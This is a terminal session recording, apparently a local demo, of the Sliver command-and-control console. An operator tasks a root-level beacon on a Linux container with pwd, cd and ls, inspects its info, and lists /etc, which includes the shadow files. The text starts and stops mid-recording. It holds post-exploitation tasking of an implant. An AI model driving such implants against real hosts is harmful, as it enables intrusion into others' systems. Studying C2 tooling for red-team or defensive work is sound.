"\u001b[32C\u001b[?25h"] +[21.092764, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[21.104102, "o", "\u001b[1m\u001b[32mls\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[21.10599, "o", "\u001b[0J\u001b[107D\u001b[1A\u001b[33D\u001b[31C\u001b[107D\u001b[33C\u001b[?25h"] +[21.410436, "o", "\u001b[33D\u001b[31C"] +[21.412152, "o", "\u001b[6n"] +[21.418941, "o", "\u001b[107D\u001b[33C\u001b[0J\u001b[107D\r\r\n\u001b[0 q\r\n"] +[21.45684, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mTasked beacon CONTINUING_DOWNTOWN (3fb0a3ef)\r\n"] +[21.457058, "o", "\r\n"] +[21.469921, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[21.470439, "o", "\u001b[1 q\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[21.471969, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[31D\u001b[31C\u001b[107D\u001b[31C\u001b[?25h"] +[23.698776, "o", "\u001b[H\u001b[2J\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[23.706583, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[23.713233, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[31D\u001b[31C\u001b[107D\u001b[31C\u001b[?25h"] +[24.204711, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[24.215048, "o", "t\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[24.216192, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[32D\u001b[31C\u001b[107D\u001b[32C\u001b[?25h"] +[24.385819, "o", "\u001b[?25l"] +[24.387265, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[24.392423, "o", "ta\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[33D\u001b[31C\u001b[107D\u001b[33C\u001b[?25h"] +[24.432631, "o", "\u001b[?25l\u001b[107D"] +[24.43278, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[24.435163, "o", "tas\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[34D\u001b[31C\u001b[107D\u001b[34C\u001b[?25h"] +[24.634834, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[24.645885, "o", "task\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[24.647113, "o", "\u001b[0J\u001b[107D\u001b[1A\u001b[35D\u001b[31C\u001b[107D\u001b[35C\u001b[?25h"] +[24.762501, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[24.762693, "o", "\u001b[6n"] +[24.764901, "o", "\u001b[1m\u001b[32mtasks\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[36D\u001b[31C\u001b[107D"] +[24.765428, "o", "\u001b[36C\u001b[?25h"] +[25.083701, "o", "\u001b[36D\u001b[31C\u001b[6n"] +[25.088072, "o", "\u001b[107D\u001b[36C\u001b[0J\u001b[107D\r\r\n"] +[25.089524, "o", "\u001b[0 q\r\n"] +[25.117898, "o", " ID State Message Type Created Sent Completed \r\n========== ========= ============== =============================== =============================== ===============================\r\n"] +[25.119642, "o", " 3fb0a3ef \u001b[1mpending\u001b[0m Ls Wed, 01 May 2024 18:59:46 UTC Thu, 01 Jan 1970 00:00:00 UTC Thu, 01 Jan 1970 00:00:00 UTC \r\n 415074fa \u001b[1mpending\u001b[0m Cd Wed, 01 May 2024 18:59:44 UTC Thu, 01 Jan 1970 00:00:00 UTC Thu, 01 Jan 1970 00:00:00 UTC \r\n 3b339091 \u001b[1mpending\u001b[0m Pwd Wed, 01 May 2024 18:59:41 UTC Thu, 01 Jan 1970 00:00:00 UTC Thu, 01 Jan 1970 00:00:00 UTC \r\n\r\n\r\n"] +[25.139008, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[25.139159, "o", "\u001b[1 q\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[25.139852, "o", "\u001b[6n"] +[25.142048, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A"] +[25.143009, "o", "\u001b[31D\u001b[31C\u001b[107D\u001b[31C\u001b[?25h"] +[30.994088, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[30.995627, "o", "\u001b[6n"] +[31.00773, "o", "i\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[31.00882, "o", "\u001b[107D\u001b[1A\u001b[32D\u001b[31C\u001b[107D\u001b[32C\u001b[?25h"] +[31.074793, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[31.075559, "o", "\u001b[6n"] +[31.078638, "o", "in\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[31.079039, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[33D\u001b[31C\u001b[107D\u001b[33C\u001b[?25h"] +[31.222549, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[31.230427, "o", "inf\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D"] +[31.231631, "o", "\u001b[1A\u001b[34D\u001b[31C\u001b[107D\u001b[34C\u001b[?25h"] +[31.311545, "o", "\u001b[?25l"] +[31.31489, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[31.320102, "o", "\u001b[1m\u001b[32minfo\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[31.321808, "o", "\u001b[107D\u001b[1A\u001b[35D\u001b[31C\u001b[107D\u001b[35C\u001b[?25h"] +[31.68305, "o", "\u001b[35D\u001b[31C"] +[31.688619, "o", "\u001b[6n"] +[31.698806, "o", "\u001b[107D\u001b[35C\u001b[0J\u001b[107D\r\r\n"] +[31.699018, "o", "\u001b[0 q\r\n"] +[31.729734, "o", "\u001b[1m Beacon ID: \u001b[0m1c2fd3e4-045b-445c-9cbc-7c955a42710c\r\n"] +[31.730149, "o", "\u001b[1m Name: \u001b[0mCONTINUING_DOWNTOWN\r\n\u001b[1m Hostname: \u001b[0m98df0494f659\r\n"] +[31.733905, "o", "\u001b[1m UUID: \u001b[0m3424b72e-e104-e99b-e183-dc60a7b751a0\r\n\u001b[1m Username: \u001b[0mroot\r\n\u001b[1m UID: \u001b[0m0\r\n\u001b[1m GID: \u001b[0m0\r\n\u001b[1m PID: \u001b[0m19246\r\n\u001b[1m OS: \u001b[0mlinux\r\n\u001b[1m Version: \u001b[0mLinux 98df0494f659 5.10.76-linuxkit\r\n\u001b[1m Locale: \u001b[0m\r\n\u001b[1m Arch: \u001b[0mamd64\r\n\u001b[1m Active C2: \u001b[0mhttps://localhost\r\n\u001b[1m Remote Address: \u001b[0m127.0.0.1:60476\r\n\u001b[1m Proxy URL: \u001b[0m\r\n"] +[31.7359, "o", "\u001b[1m Interval: \u001b[0m15s\r\n\u001b[1m Jitter: \u001b[0m30s\r\n\u001b[1m First Contact: \u001b[0mWed May 1 18:59:29 UTC 2024 (28s ago)\r\n\u001b[1m Last Checkin: \u001b[0mWed May 1 18:59:30 UTC 2024 (27s ago)\r\n\u001b[1m Next Checkin: \u001b[0m\u001b[1m\u001b[31mWed May 1 18:59:47 UTC 2024 (10s ago)\u001b[0m\r\n\r\n"] +[31.840928, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[1 q\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[31.841133, "o", "\u001b[6n"] +[31.843164, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[31D\u001b[31C\u001b[107D\u001b[31C\u001b[?25h"] +[41.421086, "o", "\u001b[31D\u001b[31C\u001b[107D\u001b[0J\r\u001b[2K\u001b[1m\u001b[32m[+] \u001b[0mCONTINUING_DOWNTOWN completed task 3b339091\r\n\r\n\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[41.421814, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[41.423966, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[41.425137, "o", "\u001b[107D\u001b[1A\u001b[31D\u001b[31C\u001b[107D\u001b[31C\u001b[?25h"] +[41.428631, "o", "\u001b[1A\u001b[31D\u001b[31C\u001b[107D\u001b[0J\r\u001b[2K\r\r\n\r\n\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[41.428722, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[41.429504, "o", "\u001b[6n"] +[41.430967, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[41.431046, "o", "\u001b[0J\u001b[107D\u001b[1A\u001b[31D\u001b[31C\u001b[107D\u001b[31C\u001b[?25h"] +[41.431653, "o", "\u001b[1A\u001b[31D\u001b[31C\u001b[107D\u001b[0J\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0m/root\r\n\r\n\r\n\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[41.432393, "o", "\u001b[6n"] +[41.43396, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[31D\u001b[31C\u001b[107D\u001b[31C\u001b[?25h"] +[41.438188, "o", "\u001b[1A\u001b[31D\u001b[31C\u001b[107D\u001b[0J\r\u001b[2K\u001b[1m\u001b[32m[+] \u001b[0mCONTINUING_DOWNTOWN completed task 415074fa\r\n\r\n\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[41.439906, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[31D\u001b[31C\u001b[107D\u001b[31C\u001b[?25h"] +[41.443023, "o", "\u001b[1A\u001b[31D\u001b[31C\u001b[107D\u001b[0J\r\u001b[2K\r\r\n\r\n\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[41.443652, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[41.443751, "o", "\u001b[6n"] +[41.445692, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[41.445832, "o", "\u001b[107D\u001b[1A\u001b[31D\u001b[31C\u001b[107D\u001b[31C\u001b[?25h\u001b[1A\u001b[31D\u001b[31C\u001b[107D\u001b[0J\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0m/etc\r\n\r\n\r\n"] +[41.446073, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[41.447912, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[31D\u001b[31C\u001b[107D\u001b[31C\u001b[?25h"] +[41.451528, "o", "\u001b[1A\u001b[31D\u001b[31C\u001b[107D\u001b[0J\r\u001b[2K\u001b[1m\u001b[32m[+] \u001b[0mCONTINUING_DOWNTOWN completed task 3fb0a3ef\r\n\r\n\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[41.452034, "o", "\u001b[6n"] +[41.454093, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[31D\u001b[31C\u001b[107D"] +[41.455191, "o", "\u001b[31C\u001b[?25h"] +[41.459438, "o", "\u001b[1A\u001b[31D\u001b[31C\u001b[107D\u001b[0J\r\u001b[2K\r\r\n\r\n\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[41.459575, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[41.459998, "o", "\u001b[6n"] +[41.461618, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A"] +[41.461799, "o", "\u001b[31D\u001b[31C\u001b[107D\u001b[31C\u001b[?25h"] +[41.46353, "o", "\u001b[1A\u001b[31D\u001b[31C\u001b[107D\u001b[0J/etc (81 items, 260.8 KiB)\r\n\r\n\r\n\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[41.46363, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[41.464981, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[31D\u001b[31C\u001b[107D\u001b[31C\u001b[?25h"] +[41.465149, "o", "\u001b[1A\u001b[31D\u001b[31C\u001b[107D\u001b[0J==========================\r\n\r\n\r\n\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[41.465556, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[41.467683, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[31D\u001b[31C\u001b[107D\u001b[31C\u001b[?25h"] +[41.470944, "o", "\u001b[1A\u001b[31D\u001b[31C\u001b[107D\u001b[0J-rw------- root:root .pwd.lock 0 B Tue Apr 25 14:03:14 +0000 2023\r\n-rw-r--r-- root:root adduser.conf 3.0 KiB Tue Apr 25 14:03:14 +0000 2023\r\ndrwxr-xr-x root:root alternatives Tue Apr 25 14:06:16 +0000 2023\r\ndrwxr-xr-x root:root apt Tue Apr 25 14:03:14 +0000 2023\r\n-rw-r--r-- root:root bash.bashrc 2.3 KiB Thu Jan 06 16:23:33 +0000 2022\r\n-rw-r--r-- root:root bindresvport.blacklist 367 B Wed Dec 16 11:04:55 +0000 2020\r\ndrwxr-xr-x root:root ca-certificates Wed May 01 13:50:41 +0000 2024\r\n-rw-r--r-- root:root ca-certificates.conf 5.8 KiB Wed May 01 13:50:51 +0000 2024\r\ndrwxr-xr-x root:root cloud Tue Apr 25 14:06:23 +0000 2023\r\ndrwxr-xr-x root:root cron.d Tue Apr 25 14:06:19 +0000 2023\r\ndrwxr-xr-x root:root cron.daily Tue Apr 25 14:06:17 +0000 2023\r\n-rw-r--r-- root:root debconf.conf 2.9 KiB Sun Feb 20 14:42:49 +0000 2022\r\n-rw-r--r-- root:root debian_version 13 B Sun Aug 22 17:00:00 +0000 2021\r\ndrwxr-xr-x root:root default Tue Apr 25 14:06:18 +0000 2023\r\n-rw-r--r-- root:root deluser.conf 604 B Sat Sep 15 22:14:19 +0000 2018\r\ndrwxr-xr-x root:root dpkg Tue Apr 25 14:06:16 +0000 2023\r\n-rw-r--r-- root:root e2scrub.conf 685 B Sat Jan 08 20:02:36 +0000 2022\r\n-rw-r--r-- root:root environment 106 B Tue Apr 25 14:03:14 +0000 2023\r\n-rw-r--r-- root:root fstab 37 B Tue Apr 25 14:03:08 +0000 2023\r\n-rw-r--r-- root:root gai.conf "] +[41.471096, "o", " 2.5 KiB Thu Feb 03 05:27:54 +0000 2022\r\n-rw-r--r-- root:root group 446 B Tue Apr 25 14:03:14 +0000 2023\r\n-rw-r----- root:shadow gshadow 374 B Tue Apr 25 14:03:14 +0000 2023\r\ndrwxr-xr-x root:root gss Mon Feb 21 20:05:20 +0000 2022\r\n-rw-r--r-- root:root host.conf 92 B Fri Oct 15 10:06:05 +0000 2021\r\n-rw-r--r-- root:root hostname 13 B Wed May 01 11:41:24 +0000 2024\r\n-rw-r--r-- root:root hosts 174 B Wed May 01 11:41:24 +0000 2024\r\ndrwxr-xr-x root:root init.d Tue Apr 25 14:06:09 +0000 2023\r\n-rw-r--r-- root:root inputrc 1.7 KiB Thu Jan 06 16:26:54 +0000 2022\r\n-rw-r--r-- root:root issue 26 B Thu Feb 16 16:02:32 +0000 2023\r\n-rw-r--r-- root:root issue.n"] +[41.471154, "o", "et 19 B Thu Feb 16 16:02:32 +0000 2023\r\ndrwxr-xr-x root:root kernel Tue Apr 25 14:03:14 +0000 2023\r\n-rw-r--r-- root:root ld.so.cache 6.6 KiB Wed May 01 13:51:02 +0000 2024\r\n-rw-r--r-- root:root ld.so.conf 34 B Wed Dec 16 11:04:55 +0000 2020\r\ndrwxr-xr-x root:root ld.so.conf.d Tue Apr 25 14:06:17 +0000 2023\r\ndrwxr-xr-x root:root ldap Wed May 01 13:50:43 +0000 2024\r\n-rw-r--r-- root:root legal 267 B Fri Oct 15 10:06:05 +0000 2021\r\n-rw-r--r-- root:root libaudit.conf 191 B Thu Mar 17 17:50:40 +0000 2022\r\ndrwxr-xr-x root:root logcheck Wed May 01 13:50:43 +0000 2024\r\n-rw-r--r-- root:root login.defs 10.5 KiB Thu Nov 11 15:42:38 +0000 2021\r\ndrwxr-xr-x root"] +[41.472038, "o", ":root logrotate.d Tue Apr 25 14:06:17 +0000 2023\r\n-rw-r--r-- root:root lsb-release 104 B Thu Feb 16 16:02:32 +0000 2023\r\n-rw-r--r-- root:root machine-id 0 B Tue Apr 25 14:06:19 +0000 2023\r\n-rw-r--r-- root:root mime.types 70.3 KiB Mon Mar 21 09:12:23 +0000 2022\r\n-rw-r--r-- root:root mke2fs.conf 744 B Sat Jan 08 20:02:36 +0000 2022\r\nLrwxrwxrwx root:root mtab -> /proc/19246/mounts 12 B Wed May 01 11:41:24 +0000 2024\r\n-rw-r--r-- root:root netconfig 767 B Thu Mar 24 16:13:48 +0000 2022\r\n-rw-r--r-- root:root networks 91 B Fri Oct 15 10:06:05 +0000 2021\r\n-rw-r--r-- root:root nsswitch.conf 494 B Wed Dec 16 11:04:55 +0000 2020\r\ndrwxr-xr-x root:root opt Tue Apr 25 14:03:08 +0000 2023\r\n"] +[41.472187, "o", "Lrwxrwxrwx root:root os-release -> ../usr/lib/os-release 21 B Thu Feb 16 16:02:32 +0000 2023\r\n-rw-r--r-- root:root pam.conf 552 B Wed Aug 12 00:15:04 +0000 2020\r\ndrwxr-xr-x root:root pam.d Tue Apr 25 14:06:18 +0000 2023\r\n-rw-r--r-- root:root passwd 922 B Tue Apr 25 14:03:14 +0000 2023\r\n-rw-r--r-- root:root profile 582 B Fri Oct 15 10:06:05 +0000 2021\r\ndrwxr-xr-x root:root profile.d Tue Apr 25 14:06:16 +0000 2023\r\ndrwxr-xr-x root:root python3 Wed May 01 11:42:42 +0000 2024\r\ndrwxr-xr-x root:root python3.10 Wed May 01 11:42:32 +0000 2024\r\ndrwxr-xr-x root:root rc0.d Tue Feb 15 22:32:46 +0000 2022\r\ndrwxr-xr-x root:root rc1.d Tue Feb 15 22:32"] +[41.472239, "o", ":46 +0000 2022\r\ndrwxr-xr-x root:root rc2.d Tue Feb 15 22:32:46 +0000 2022\r\ndrwxr-xr-x root:root rc3.d Tue Feb 15 22:32:46 +0000 2022\r\ndrwxr-xr-x root:root rc4.d Tue Feb 15 22:32:46 +0000 2022\r\ndrwxr-xr-x root:root rc5.d Tue Feb 15 22:32:46 +0000 2022\r\ndrwxr-xr-x root:root rc6.d Tue Feb 15 22:32:46 +0000 2022\r\ndrwxr-xr-x root:root rcS.d Tue Apr 25 14:03:13 +0000 2023\r\n-rw-r--r-- root:root resolv.conf 97 B Wed May 01 11:41:24 +0000 2024\r\nLrwxrwxrwx root:root rmt -> /usr/sbin/rmt-tar 13 B Wed Feb 15 15:45:50 +0000 2023\r\ndrwxr-xr-x root:root security Tue Apr 25 14:06:17 +0000 2023\r\ndrwxr-xr-x root:root selinux "] +[41.472272, "o", "Tue Apr 25 14:05:13 +0000 2023\r\n-rw-r----- root:shadow shadow 501 B Tue Apr 25 14:03:14 +0000 2023\r\n-rw-r--r-- root:root shells 142 B Wed May 01 12:11:33 +0000 2024\r\ndrwxr-xr-x root:root skel Tue Apr 25 14:03:24 +0000 2023\r\ndrwxr-xr-x root:root ssl Wed May 01 13:50:43 +0000 2024\r\n-rw-r--r-- root:root subgid 0 B Tue Apr 25 14:03:14 +0000 2023\r\n-rw-r--r-- root:root subuid 0 B Tue Apr 25 14:03:14 +0000 2023\r\n-rw-r--r-- root:root sysctl.conf 2.3 KiB Fri Feb 25 11:32:20 +0000 2022\r\ndrwxr-xr-x root:root sysctl.d Tue Apr 25 14:05:58 +0000 2023\r\ndrwxr-xr-x root:root systemd Tue Feb 15 22:32:46 +0000 2022\r\ndrwxr-xr-x root:root terminfo "] +[41.472539, "o", " Tue Apr 25 14:05:50 +0000 2023\r\ndrwxr-xr-x root:root update-motd.d Tue Apr 25 14:06:16 +0000 2023\r\n-rw-r--r-- root:root xattr.conf 681 B Wed Mar 23 09:41:49 +0000 2022\r\n\r\n\r\n\r\n\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[41.476523, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[41.476952, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[31D\u001b[31C\u001b[107D\u001b[31C\u001b[?25h"] +[43.195143, "o", "\u001b[H\u001b[2J\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[43.19903, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[43.205324, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[31D\u001b[31C\u001b[107D\u001b[31C\u001b[?25h"] +[43.633966, "o", "\u001b[?25l"] +[43.639118, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[43.64733, "o", "t\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[43.64818, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[32D\u001b[31C\u001b[107D\u001b[32C\u001b[?25h"] +[43.790363, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[43.799145, "o", "ta\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[43.80128, "o", "\u001b[107D\u001b[1A\u001b[33D\u001b[31C\u001b[107D\u001b[33C\u001b[?25h"] +[43.947953, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[43.95823, "o", "tas\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[43.959494, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[34D\u001b[31C\u001b[107D\u001b[34C\u001b[?25h"] +[44.104066, "o", "\u001b[?25l\u001b[107D"] +[44.109283, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[44.11694, "o", "task\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[35D\u001b[31C\u001b[107D\u001b[35C\u001b[?25h"] +[44.191033, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > \u001b[6n"] +[44.199196, "o", "\u001b[1m\u001b[32mtasks\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[44.200362, "o", "\u001b[107D\u001b[1A\u001b[36D\u001b[31C\u001b[107D\u001b[36C\u001b[?25h"] +[44.475015, "o", "\u001b[36D\u001b[31C"] +[44.487286, "o", "\u001b[6n"] +[44.490867, "o", "\u001b[107D\u001b[36C\u001b[0J\u001b[107D"] +[44.491172, "o", "\r\r\n\u001b[0 q\r\n"] +[44.502456, "o", " ID State Message Type Created Sent Completed \r\n========== =========== ============== =============================== =============================== ===============================\r\n"] +[44.502842, "o", " 3fb0a3ef \u001b[1m\u001b[32mcompleted\u001b[0m Ls Wed, 01 May 2024 18:59:46 UTC Wed, 01 May 2024 19:00:06 UTC Wed, 01 May 2024 19:00:06 UTC \r\n 415074fa \u001b[1m\u001b[32mcompleted\u001b[0m Cd Wed, 01 May 2024 18:59:44 UTC Wed, 01 May 2024 19:00:06 UTC Wed, 01 May 2024 19:00:06 UTC \r\n 3b339091 \u001b[1m\u001b[32mcompleted\u001b[0m Pwd Wed, 01 May 2024 18:59:41 UTC Wed, 01 May 2024 19:00:06 UTC Wed, 01 May 2024 19:00:06 UTC \r\n\r\n\r\n"] +[44.521043, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[44.521239, "o", "\u001b[1 q\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m\u001b[1m\u001b[34m (CONTINUING_DOWNTOWN)\u001b[0m > "] +[44.521899, "o", "\u001b[6n"] +[44.5248, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D"] +[44.524934, "o", "\u001b[1A\u001b[31D\u001b[31C\u001b[107D\u001b[31C\u001b[?25h"] +[45.138254, "o", "\u001b[?25l\u001b[107D"] +[45.140209, "o", 